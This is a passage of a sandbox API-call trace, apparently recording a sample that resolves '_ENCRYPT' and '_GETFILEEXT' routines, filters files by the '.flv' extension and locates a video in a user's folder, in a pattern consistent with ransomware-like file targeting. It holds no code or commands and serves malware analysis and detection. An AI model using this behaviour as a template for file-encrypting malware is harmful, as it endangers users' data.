hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.656] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0198.657] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.658] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.658] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0198.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.659] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.659] CloseHandle (hObject=0x160) returned 1 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.660] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.660] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.661] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.661] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.661] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.661] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.661] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.661] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.661] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.661] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.662] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xaf27bc50, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 0x90add8 [0198.662] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.662] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.662] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xaf27bc50, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 0x90add8 [0198.662] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.662] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iUj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uj36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="36y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 